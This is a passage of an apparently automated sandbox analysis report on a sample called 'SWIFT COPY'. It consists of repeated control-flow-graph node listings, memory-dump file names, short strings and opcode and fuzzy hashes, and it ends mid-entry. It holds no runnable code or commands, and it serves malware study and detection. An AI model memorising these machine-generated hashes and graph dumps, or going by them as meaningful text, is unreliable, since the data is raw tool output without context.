99a2fa4-99a2fab 1655->1675 1678 99a2ffb 1656->1678 1679 99a3000-99a3016 1656->1679 1664 99a2eae 1657->1664 1665 99a2eb3-99a2ec5 1657->1665 1658->1640 1659->1640 1660->1640 1661->1640 1662->1640 1670 99a30b8-99a30ca 1663->1670 1671 99a30b3 1663->1671 1664->1665 1665->1640 1680 99a2dbf-99a2dc5 1666->1680 1667->1680 1683 99a2e05-99a2e0b 1668->1683 1669->1683 1670->1640 1671->1670 1672->1673 1692 99a2e4c-99a2e61 1673->1692 1693 99a2e47 1673->1693 1682 99a2fb2-99a2fb8 1674->1682 1675->1682 1685 99a2fe2-99a2fe8 1676->1685 1677->1685 1678->1679 1694 99a3018 1679->1694 1695 99a301d-99a3033 1679->1695 1680->1640 1682->1640 1683->1640 1685->1640 1692->1640 1693->1692 1694->1695 1698 99a303a-99a3050 1695->1698 1699 99a3035 1695->1699 1701 99a3052 1698->1701 1702 99a3057-99a3076 1698->1702 1699->1698 1701->1702 1702->1640 1704->1639 1705->1639
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ry$ry$ry
                                                                                              • API String ID: 0-128149707
                                                                                              • Opcode ID: 95e4b84ecfddd7efa3b2e70f56df14870d1d915d2f7f6de892680f5e72884da2
                                                                                              • Instruction ID: a8c2c6909c59af679086080ecd6488e0318991734b6031b5750a870da68ae00b
                                                                                              • Opcode Fuzzy Hash: 95e4b84ecfddd7efa3b2e70f56df14870d1d915d2f7f6de892680f5e72884da2
                                                                                              • Instruction Fuzzy Hash: DEE19174D1420ADFDB04CFA5C4854AEFBB2FF89340B14D969D422AB259D738A982CFD4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1706 99a2c10-99a2d1d 1720 99a2d1f 1706->1720 1721 99a2d24-99a2d60 1706->1721 1720->1721 1788 99a2d62 call 99a32b0 1721->1788 1789 99a2d62 call 99a32a0 1721->1789 1723 99a2d68 1724 99a2d6f-99a2d8b 1723->1724 1725 99a2d8d 1724->1725 1726 99a2d94-99a2d95 1724->1726 1725->1723 1727 99a2d9a-99a2d9e 1725->1727 1728 99a30eb-99a30f2 1725->1728 1729 99a2ddb-99a2de4 1725->1729 1730 99a307b-99a30a0 1725->1730 1731 99a2fbd-99a2fc1 1725->1731 1732 99a2e7d-99a2e9b 1725->1732 1733 99a2f73-99a2f88 1725->1733 1734 99a2e10-99a2e28 1725->1734 1735 99a2eca-99a2eea 1725->1735 1736 99a2f2b-99a2f42 1725->1736 1737 99a2eef-99a2f01 1725->1737 1738 99a30cf-99a30e6 1725->1738 1739 99a2f8d-99a2f91 1725->1739 1740 99a2fed-99a2ff9 1725->1740 1741 99a2ea0-99a2eac 1725->1741 1742 99a2f61-99a2f6e 1725->1742 1743 99a2f06-99a2f26 1725->1743 1744 99a2e66-99a2e78 1725->1744 1745 99a2f47-99a2f5c 1725->1745 1746 99a2dc7-99a2dd9 1725->1746 1747 99a30a5-99a30b1 1725->1747 1726->1727 1726->1728 1750 99a2da0-99a2daf 1727->1750 1751 99a2db1-99a2db8 1727->1751 1752 99a2de6-99a2df5 1729->1752 1753 99a2df7-99a2dfe 1729->1753 1730->1724 1760 99a2fc3-99a2fd2 1731->1760 1761 99a2fd4-99a2fdb 1731->1761 1732->1724 1733->1724 1756 99a2e2a 1734->1756 1757 99a2e2f-99a2e45 1734->1757 1735->1724 1736->1724 1737->1724 1738->1724 1758 99a2f93-99a2fa2 1739->1758 1759 99a2fa4-99a2fab 1739->1759 1762 99a2ffb 1740->1762 1763 99a3000-99a3016 1740->1763 1748 99a2eae 1741->1748 1749 99a2eb3-99a2ec5 1741->1749 1742->1724 1743->1724 1744->1724 1745->1724 1746->1724 1754 99a30b8-99a30ca 1747->1754 1755 99a30b3 1747->1755 1748->1749 1749->1724 1764 99a2dbf-99a2dc5 1750->1764 1751->1764 1767 99a2e05-99a2e0b 1752->1767 1753->1767 1754->1724 1755->1754 1756->1757 1776 99a2e4c-99a2e61 1757->1776 1777 99a2e47 1757->1777 1766 99a2fb2-99a2fb8 1758->1766 1759->1766 1769 99a2fe2-99a2fe8 1760->1769 1761->1769 1762->1763 1778 99a3018 1763->1778 1779 99a301d-99a3033 1763->1779 1764->1724 1766->1724 1767->1724 1769->1724 1776->1724 1777->1776 1778->1779 1782 99a303a-99a3050 1779->1782 1783 99a3035 1779->1783 1785 99a3052 1782->1785 1786 99a3057-99a3076 1782->1786 1783->1782 1785->1786 1786->1724 1788->1723 1789->1723
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ry$ry$ry
                                                                                              • API String ID: 0-128149707
                                                                                              • Opcode ID: d5ec9d92a16aa22050f4a27e60ce0e2dc7857c3c7c378c61a6e856d9a7052c91
                                                                                              • Instruction ID: 44420a9e87499b365d134092105badd857cb3b6a9446fae3ddcda6fedf2b4b21
                                                                                              • Opcode Fuzzy Hash: d5ec9d92a16aa22050f4a27e60ce0e2dc7857c3c7c378c61a6e856d9a7052c91
                                                                                              • Instruction Fuzzy Hash: F0E1A374D1420ADFCB04CFA5C4854AEFBB2FF89340B15D969D422AB259D738A982CFD4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1790 99a2cf8-99a2d1d 1791 99a2d1f 1790->1791 1792 99a2d24-99a2d60 1790->1792 1791->1792 1859 99a2d62 call 99a32b0 1792->1859 1860 99a2d62 call 99a32a0 1792->1860 1794 99a2d68 1795 99a2d6f-99a2d8b 1794->1795 1796 99a2d8d 1795->1796 1797 99a2d94-99a2d95 1795->1797 1796->1794 1798 99a2d9a-99a2d9e 1796->1798 1799 99a30eb-99a30f2 1796->1799 1800 99a2ddb-99a2de4 1796->1800 1801 99a307b-99a30a0 1796->1801 1802 99a2fbd-99a2fc1 1796->1802 1803 99a2e7d-99a2e9b 1796->1803 1804 99a2f73-99a2f88 1796->1804 1805 99a2e10-99a2e28 1796->1805 1806 99a2eca-99a2eea 1796->1806 1807 99a2f2b-99a2f42 1796->1807 1808 99a2eef-99a2f01 1796->1808 1809 99a30cf-99a30e6 1796->1809 1810 99a2f8d-99a2f91 1796->1810 1811 99a2fed-99a2ff9 1796->1811 1812 99a2ea0-99a2eac 1796->1812 1813 99a2f61-99a2f6e 1796->1813 1814 99a2f06-99a2f26 1796->1814 1815 99a2e66-99a2e78 1796->1815 1816 99a2f47-99a2f5c 1796->1816 1817 99a2dc7-99a2dd9 1796->1817 1818 99a30a5-99a30b1 1796->1818 1797->1798 1797->1799 1821 99a2da0-99a2daf 1798->1821 1822 99a2db1-99a2db8 1798->1822 1823 99a2de6-99a2df5 1800->1823 1824 99a2df7-99a2dfe 1800->1824 1801->1795 1831 99a2fc3-99a2fd2 1802->1831 1832 99a2fd4-99a2fdb 1802->1832 1803->1795 1804->1795 1827 99a2e2a 1805->1827 1828 99a2e2f-99a2e45 1805->1828 1806->1795 1807->1795 1808->1795 1809->1795 1829 99a2f93-99a2fa2 1810->1829 1830 99a2fa4-99a2fab 1810->1830 1833 99a2ffb 1811->1833 1834 99a3000-99a3016 1811->1834 1819 99a2eae 1812->1819 1820 99a2eb3-99a2ec5 1812->1820 1813->1795 1814->1795 1815->1795 1816->1795 1817->1795 1825 99a30b8-99a30ca 1818->1825 1826 99a30b3 1818->1826 1819->1820 1820->1795 1835 99a2dbf-99a2dc5 1821->1835 1822->1835 1838 99a2e05-99a2e0b 1823->1838 1824->1838 1825->1795 1826->1825 1827->1828 1847 99a2e4c-99a2e61 1828->1847 1848 99a2e47 1828->1848 1837 99a2fb2-99a2fb8 1829->1837 1830->1837 1840 99a2fe2-99a2fe8 1831->1840 1832->1840 1833->1834 1849 99a3018 1834->1849 1850 99a301d-99a3033 1834->1850 1835->1795 1837->1795 1838->1795 1840->1795 1847->1795 1848->1847 1849->1850 1853 99a303a-99a3050 1850->1853 1854 99a3035 1850->1854 1856 99a3052 1853->1856 1857 99a3057-99a3076 1853->1857 1854->1853 1856->1857 1857->1795 1859->1794 1860->1794
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ry$ry$ry
                                                                                              • API String ID: 0-128149707
                                                                                              • Opcode ID: 5e8bcbb900c4b5dfd6b5878499976038121e9b475a62dd366fea00dff023e863
                                                                                              • Instruction ID: 8f4b7fd1c77b9dc83dfd06c247536db062b9e62d75e3d6626e8eed98b279ce11
                                                                                              • Opcode Fuzzy Hash: 5e8bcbb900c4b5dfd6b5878499976038121e9b475a62dd366fea00dff023e863
                                                                                              • Instruction Fuzzy Hash: 91C14C74D1520ADFCB14CF95C4858AEFBB2FF89340B10D969D426AB219D734A982CF94

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1861 99a0af2-99a0bb3 1868 99a0bba-99a0c14 1861->1868 1869 99a0bb5 1861->1869 1872 99a0c17 1868->1872 1869->1868 1873 99a0c1e-99a0c3a 1872->1873 1874 99a0c3c 1873->1874 1875 99a0c43-99a0c44 1873->1875 1874->1872 1874->1875 1876 99a0cdc-99a0d06 1874->1876 1877 99a0d93-99a0dae 1874->1877 1878 99a0c73-99a0c85 1874->1878 1879 99a0db3-99a0dca 1874->1879 1880 99a0df0-99a0e60 1874->1880 1881 99a0d0b-99a0d41 1874->1881 1882 99a0c49-99a0c71 1874->1882 1883 99a0dcf-99a0deb 1874->1883 1884 99a0cac-99a0cb0 1874->1884 1885 99a0d60-99a0d8e 1874->1885 1886 99a0d46-99a0d5b 1874->1886 1887 99a0c87-99a0c8d 1874->1887 1875->1880 1876->1873 1877->1873 1878->1873 1879->1873 1905 99a0e62 call 99a214b 1880->1905 1906 99a0e62 call 99a2ae8 1880->1906 1907 99a0e62 call 99a1e88 1880->1907 1908 99a0e62 call 99a1e79 1880->1908 1909 99a0e62 call 99a2b37 1880->1909 1881->1873 1882->1873 1883->1873 1888 99a0cb2-99a0cc1 1884->1888 1889 99a0cc3-99a0cca 1884->1889 1885->1873 1886->1873 1903 99a0c8f call 99a1450 1887->1903 1904 99a0c8f call 99a1440 1887->1904 1892 99a0cd1-99a0cd7 1888->1892 1889->1892 1891 99a0c95-99a0ca7 1891->1873 1892->1873 1902 99a0e68-99a0e72 1903->1891 1904->1891 1905->1902 1906->1902 1907->1902 1908->1902 1909->1902
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Tetq$Tetq$z^I
                                                                                              • API String ID: 0-2759915012
                                                                                              • Opcode ID: 97ae65e25326317ae75d236178f08ae382534cfeb897882379595a257c8b3d03
                                                                                              • Instruction ID: 8869fda6d137d557cd8888f72002ca179894a10a5280496c828396e6ee76fdfc
                                                                                              • Opcode Fuzzy Hash: 97ae65e25326317ae75d236178f08ae382534cfeb897882379595a257c8b3d03
                                                                                              • Instruction Fuzzy Hash: 59B11674E05259CFCB08CFA9C99499EFBF2FF89300F14942AD415AB268D7399941CF94

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1910 99a0b90-99a0bb3 1911 99a0bba-99a0c14 1910->1911 1912 99a0bb5 1910->1912 1915 99a0c17 1911->1915 1912->1911 1916 99a0c1e-99a0c3a 1915->1916 1917 99a0c3c 1916->1917 1918 99a0c43-99a0c44 1916->1918 1917->1915 1917->1918 1919 99a0cdc-99a0d06 1917->1919 1920 99a0d93-99a0dae 1917->1920 1921 99a0c73-99a0c85 1917->1921 1922 99a0db3-99a0dca 1917->1922 1923 99a0df0-99a0e60 1917->1923 1924 99a0d0b-99a0d41 1917->1924 1925 99a0c49-99a0c71 1917->1925 1926 99a0dcf-99a0deb 1917->1926 1927 99a0cac-99a0cb0 1917->1927 1928 99a0d60-99a0d8e 1917->1928 1929 99a0d46-99a0d5b 1917->1929 1930 99a0c87-99a0c8d 1917->1930 1918->1923 1919->1916 1920->1916 1921->1916 1922->1916 1948 99a0e62 call 99a214b 1923->1948 1949 99a0e62 call 99a2ae8 1923->1949 1950 99a0e62 call 99a1e88 1923->1950 1951 99a0e62 call 99a1e79 1923->1951 1952 99a0e62 call 99a2b37 1923->1952 1924->1916 1925->1916 1926->1916 1931 99a0cb2-99a0cc1 1927->1931 1932 99a0cc3-99a0cca 1927->1932 1928->1916 1929->1916 1946 99a0c8f call 99a1450 1930->1946 1947 99a0c8f call 99a1440 1930->1947 1935 99a0cd1-99a0cd7 1931->1935 1932->1935 1934 99a0c95-99a0ca7 1934->1916 1935->1916 1945 99a0e68-99a0e72 1946->1934 1947->1934 1948->1945 1949->1945 1950->1945 1951->1945 1952->1945
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Tetq$Tetq$z^I
                                                                                              • API String ID: 0-2759915012
                                                                                              • Opcode ID: 30b813691759d00844bb36cfd3c1cc9bd279d38584269ed7d6d1d0d58ac10591
                                                                                              • Instruction ID: 4fbf7e59b81af54635c7341515da128d32f7cc2a18c238f1591cbe37d28e9617
                                                                                              • Opcode Fuzzy Hash: 30b813691759d00844bb36cfd3c1cc9bd279d38584269ed7d6d1d0d58ac10591
                                                                                              • Instruction Fuzzy Hash: 0A91C3B4E142198FCB08CFAAC59459EFBB2FF89300F24942AD415BB354D7359945CFA4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1975 99a9598-99a95bd 1976 99a95bf 1975->1976 1977 99a95c4-99a95f5 1975->1977 1976->1977 1978 99a95f6 1977->1978 1979 99a95fd-99a9619 1978->1979 1980 99a961b 1979->1980 1981 99a9622-99a9623 1979->1981 1980->1978 1980->1981 1982 99a977b-99a9790 1980->1982 1983 99a96f8-99a970f 1980->1983 1984 99a9859-99a9870 1980->1984 1985 99a96b0-99a96c2 1980->1985 1986 99a9714-99a9727 1980->1986 1987 99a9795-99a979e 1980->1987 1988 99a9875-99a988a 1980->1988 1989 99a982b-99a983d 1980->1989 1990 99a9628-99a966a 1980->1990 1991 99a980e-99a9826 1980->1991 1992 99a988f-99a9898 1980->1992 1993 99a97cf-99a97e2 1980->1993 1994 99a972c-99a9730 1980->1994 1995 99a966c-99a967f 1980->1995 1996 99a9842-99a9854 1980->1996 1997 99a97a3-99a97ca 1980->1997 1998 99a9763-99a9776 1980->1998 1999 99a96c7-99a96cd call 99a99d8 1980->1999 2000 99a9684-99a96ab 1980->2000 1981->1992 1982->1979 1983->1979 1984->1979 1985->1979 1986->1979 1987->1979 1988->1979 1989->1979 1990->1979 1991->1979 2003 99a97e4-99a97f3 1993->2003 2004 99a97f5-99a97fc 1993->2004 2001 99a9732-99a9741 1994->2001 2002 99a9743-99a974a 1994->2002 1995->1979 1996->1979 1997->1979 1998->1979 2010 99a96d3-99a96f3 1999->2010 2000->1979 2005 99a9751-99a975e 2001->2005 2002->2005 2009 99a9803-99a9809 2003->2009 2004->2009 2005->1979 2009->1979 2010->1979
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: TuA$UC;"
                                                                                              • API String ID: 0-2071649361
                                                                                              • Opcode ID: 0a6c68760727a7bf6657d995193d509be9c600448756eda4dc36126c68d2dee9
                                                                                              • Instruction ID: e070a9567197f1b47381ee2808c0a5094ea02735c02328da3941a7c574578d2e
                                                                                              • Opcode Fuzzy Hash: 0a6c68760727a7bf6657d995193d509be9c600448756eda4dc36126c68d2dee9
                                                                                              • Instruction Fuzzy Hash: C291E774D05209EFCB08CFAAD98159EFBF2FF89350F10A52AE415A7264D7349942CF90

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2013 99a958a-99a95bd 2015 99a95bf 2013->2015 2016 99a95c4-99a95f5 2013->2016 2015->2016 2017 99a95f6 2016->2017 2018 99a95fd-99a9619 2017->2018 2019 99a961b 2018->2019 2020 99a9622-99a9623 2018->2020 2019->2017 2019->2020 2021 99a977b-99a9790 2019->2021 2022 99a96f8-99a970f 2019->2022 2023 99a9859-99a9870 2019->2023 2024 99a96b0-99a96c2 2019->2024 2025 99a9714-99a9727 2019->2025 2026 99a9795-99a979e 2019->2026 2027 99a9875-99a988a 2019->2027 2028 99a982b-99a983d 2019->2028 2029 99a9628-99a966a 2019->2029 2030 99a980e-99a9826 2019->2030 2031 99a988f-99a9898 2019->2031 2032 99a97cf-99a97e2 2019->2032 2033 99a972c-99a9730 2019->2033 2034 99a966c-99a967f 2019->2034 2035 99a9842-99a9854 2019->2035 2036 99a97a3-99a97ca 2019->2036 2037 99a9763-99a9776 2019->2037 2038 99a96c7-99a96cd call 99a99d8 2019->2038 2039 99a9684-99a96ab 2019->2039 2020->2031 2021->2018 2022->2018 2023->2018 2024->2018 2025->2018 2026->2018 2027->2018 2028->2018 2029->2018 2030->2018 2042 99a97e4-99a97f3 2032->2042 2043 99a97f5-99a97fc 2032->2043 2040 99a9732-99a9741 2033->2040 2041 99a9743-99a974a 2033->2041 2034->2018 2035->2018 2036->2018 2037->2018 2049 99a96d3-99a96f3 2038->2049 2039->2018 2044 99a9751-99a975e 2040->2044 2041->2044 2048 99a9803-99a9809 2042->2048 2043->2048 2044->2018 2048->2018 2049->2018
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: TuA$UC;"
                                                                                              • API String ID: 0-2071649361
                                                                                              • Opcode ID: cb4b8461853e39876971833bf8f092b132d04158249ff00c73d22504302193cc
                                                                                              • Instruction ID: dbc5457112420909d0a628582195f619a836c003b123a19db792cd96fa25202d
                                                                                              • Opcode Fuzzy Hash: cb4b8461853e39876971833bf8f092b132d04158249ff00c73d22504302193cc
                                                                                              • Instruction Fuzzy Hash: 5691D575D05209AFCB08CFAAE9C159EFBF2FF89350F10A42AE415A7264D7349942CF90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 5=6
                                                                                              • API String ID: 0-2897083178
                                                                                              • Opcode ID: 5fc32711835b8b8184c92cb5f844e0ec436d004c4bceb2ba1280a08106c48456
                                                                                              • Instruction ID: 90ee9281bb9cf199919a57112f27d9d82fe9c65bb00d68ede7bf3a55bc664a0c
                                                                                              • Opcode Fuzzy Hash: 5fc32711835b8b8184c92cb5f844e0ec436d004c4bceb2ba1280a08106c48456
                                                                                              • Instruction Fuzzy Hash: 7B714574E0521A9FCB48CFE6D9454AEFBF2FF89340F10992AD416E7254D7389A018FA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 5=6
                                                                                              • API String ID: 0-2897083178
                                                                                              • Opcode ID: 19ae730dd04957da4fdcc9d5bd09a24858db7cc1a6fe2b1ba1ecfdf898ed8cec
                                                                                              • Instruction ID: fdb5770c90fc0ac96900a81603b88d0cbcc35b777cf869c2d904b8d6c89336c8
                                                                                              • Opcode Fuzzy Hash: 19ae730dd04957da4fdcc9d5bd09a24858db7cc1a6fe2b1ba1ecfdf898ed8cec
                                                                                              • Instruction Fuzzy Hash: CB612574E0521A9FCB48CFE6D9454AEFBF2FF89340F10992AD416E7254D7389A018FA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -2m
                                                                                              • API String ID: 0-2686427999
                                                                                              • Opcode ID: 1fbab02a853681d5a0989c28071c8db95988105bc5f76b92defebb7deced5095
                                                                                              • Instruction ID: b113fd9959d07d22a53cbc50c9c39018960da677d5a016d3469e454dc621dcce
                                                                                              • Opcode Fuzzy Hash: 1fbab02a853681d5a0989c28071c8db95988105bc5f76b92defebb7deced5095
                                                                                              • Instruction Fuzzy Hash: EB513D74E05219CFCB08CFAAC8406AEFBF2FF89341F24D46AD41AA7254D7349941CBA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -2m
                                                                                              • API String ID: 0-2686427999
                                                                                              • Opcode ID: 14e2a371c6ec69a3a733524f786469b00586673037ec1cf8f10bd43a1a2a5c8d
                                                                                              • Instruction ID: a7a1da6fa1bdabb149c1678e4343a5601959a56a6d1548b04f68f330bc5bd10e
                                                                                              • Opcode Fuzzy Hash: 14e2a371c6ec69a3a733524f786469b00586673037ec1cf8f10bd43a1a2a5c8d
                                                                                              • Instruction Fuzzy Hash: 39510BB4E052198FCB08CF9AC9405AEFBF2FF89341F24E56AD41AA7254D7349941CBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 93bc51d067990b5b908c14ab85d23406dee632b2f8907a2277e1a0a6bb26e89d
                                                                                              • Instruction ID: da61d610ce171d6a8610eb23d64310a1ed3137191e082be4c30f1aa0b44a9350
                                                                                              • Opcode Fuzzy Hash: 93bc51d067990b5b908c14ab85d23406dee632b2f8907a2277e1a0a6bb26e89d
                                                                                              • Instruction Fuzzy Hash: 51B14277A10302CFD309CF69C4C58D9BBA1FB52301B5B88A6E5868B650D735FA478BD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c6f5a8ca2a7312a9c973ddc1a5e445a2c16144e120ef4c5b34a99921b0591640
                                                                                              • Instruction ID: 81ea89d4c030e5387a2caf45aba8ff2fec38cf22b6a8cca498e4cb2fb6e933b7
                                                                                              • Opcode Fuzzy Hash: c6f5a8ca2a7312a9c973ddc1a5e445a2c16144e120ef4c5b34a99921b0591640
                                                                                              • Instruction Fuzzy Hash: 5DA15077B14302CFE3098E79C4D98D97BA0FB5230175B88A2E4868B650D735FA478BD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ca7ff9a5130ad7adad56b25e72e249555facba4a12955e1acc0e05d769964b1
                                                                                              • Instruction ID: 0e36cd4a14a360cf15e4aa63c739c0c7b396817cac01b2cbf3cd66dc6aa2928d
                                                                                              • Opcode Fuzzy Hash: 4ca7ff9a5130ad7adad56b25e72e249555facba4a12955e1acc0e05d769964b1
                                                                                              • Instruction Fuzzy Hash: A9A17177B14302CFE3098E7AC4C98C97BA4FB5230175B88A6E4868B650D335FA478BD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 008e84f9ba23cfb352fbf39b327697cb67a9cd47baf02ce7286a7cf35b66be4a
                                                                                              • Instruction ID: a7862aeaeca15db226f265274f5f87b16e28a128c176a02fbeb1e643d7f0ec7a
                                                                                              • Opcode Fuzzy Hash: 008e84f9ba23cfb352fbf39b327697cb67a9cd47baf02ce7286a7cf35b66be4a
                                                                                              • Instruction Fuzzy Hash: 83A16177714302CFE3098E79C4C98D97BA0FB5230175B88A2E5868B650D735FA478BD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e79a79be4c005c1228352aae948b460f0f1f295f92e86f7df5754e1c6df9e037
                                                                                              • Instruction ID: c8e7a26af39a82851e957e9aa11a20c81a4bea55abc50165ad96ff3176cb5899
                                                                                              • Opcode Fuzzy Hash: e79a79be4c005c1228352aae948b460f0f1f295f92e86f7df5754e1c6df9e037
                                                                                              • Instruction Fuzzy Hash: E5A16177B14302CFE3098E79C4C98D97BA1FB5230175B88A6E4868B650D735FA478BD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0326d3f2e6d4323d740ff0887dd6a737583565aebad463ebacff84ccfbc995ab
                                                                                              • Instruction ID: 422172e618f2354207242c704947cc4c991cf0f9bfae6e2f67799600f805a2b1
                                                                                              • Opcode Fuzzy Hash: 0326d3f2e6d4323d740ff0887dd6a737583565aebad463ebacff84ccfbc995ab
                                                                                              • Instruction Fuzzy Hash: EFA16077B14302CFE3098E69C4C98D97BA0FB5330175B88A6E4868B650D735FA478BD6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b97f8b4cfdf1df485a097f38a01caf763f7d509e1c9d29f1f4f0b0edb0007f5c
                                                                                              • Instruction ID: 10ba36dd59a953f510afe5b8887802bf65a741ced937de4fc9ef44b3453db232
